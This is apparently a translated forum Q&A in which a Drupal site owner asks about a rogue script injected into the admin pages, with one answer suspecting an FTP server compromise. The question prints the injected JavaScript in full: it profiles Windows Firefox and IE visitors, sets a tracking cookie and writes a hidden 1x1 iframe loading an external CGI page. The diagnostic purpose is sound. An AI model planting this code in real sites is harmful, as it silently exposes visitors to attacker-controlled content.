为什么“103fm”脚本出现在Drupal网站上?

时间:2012-04-20 03:15:07

标签: javascript html drupal

  

可能重复:
  Weird Script Appearing In My Website's DOM

我刚注意到在我的网站DOM中运行了一个奇怪的脚本。我正在运行DRUPAL。该脚本为http://www.103fm.net/release.js。我不知道从哪里开始寻找这个流氓脚本。我的网站是miloads.com,它只发生在管理菜单中。奇怪的是103fm.net上不存在该文件,但它实际上加载了以下脚本:

var BrowserDetect = {
init: function() {
this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
this.OS = this.searchString(this.dataOS) || "an unknown OS";
},
searchString: function(data) {
for (var i = 0; i < data.length; i++) {
var dataString = data[i].string;
var dataProp = data[i].prop;
this.versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString) {
if (dataString.indexOf(data[i].subString) != -1)
return data[i].identity;
} else if (dataProp)
return data[i].identity;
}
},
searchVersion: function(dataString) {
var index = dataString.indexOf(this.versionSearchString);
if (index == -1)
return;
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
},
dataBrowser: [{
string: navigator.userAgent,
subString: "Firefox",
identity: "Firefox"
}, {
string: navigator.userAgent,
subString: "MSIE",
identity: "Explorer",
versionSearch: "MSIE"
}],
dataOS: [{
string: navigator.platform,
subString: "Win",
identity: "Windows"
}]
};
function addCookie(szName, szValue, dtDaysExpires) {
var dtExpires = new Date();
var dtExpiryDate = "";
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
dtExpiryDate = dtExpires.toGMTString();
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}
function findCookie(szName) {
var i = 0;
var nStartPosition = 0;
var nEndPosition = 0;
var szCookieString = document.cookie;
while (i <= szCookieString.length) {
nStartPosition = i;
nEndPosition = nStartPosition + szName.length;
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
nStartPosition = nEndPosition + 1;
nEndPosition = document.cookie.indexOf(";", nStartPosition);
if (nEndPosition < nStartPosition)
nEndPosition = document.cookie.length;
return document.cookie.substring(nStartPosition, nEndPosition);
break;
}
i++;
}
return "";
}
BrowserDetect.init();
var szCookieString = document.cookie;
var stopit = BrowserDetect.browser;
var os = BrowserDetect.OS;
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) {
addCookie("geo_id2", "753445", 1);
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>");
} else {}

1 个答案:

答案 0 :(得分:1)

同样,我们的客户服务器昨晚在罗马尼亚,捷克共和国和波兰的IP地址遭到入侵。这些看似自动化的过程似乎在body标签的顶部注入了一个脚本标记。此脚本似乎在运行Firefox和IE的Windows计算机上生成cookie。然后它打开一个iframe并运行在俄罗斯托管的站点上运行的CGI脚本。

幸运的是,最新版本的Firefox甚至不会加载脚本;但是IE确实如此。

Chrome(尽管不受影响)甚至不允许您访问发生这种情况的页面。

由于我最近发现的所有报告都发生了,它很可能是软件的可用性,而不是密码泄露 - 你运行的是什么FTP服务器(用你的FTP客户端连接到服务器,控制台应该告诉你您)。有问题的服务器正在运行ProFTPd 1.3.1。

如果该软件很常见,则应通知创作者。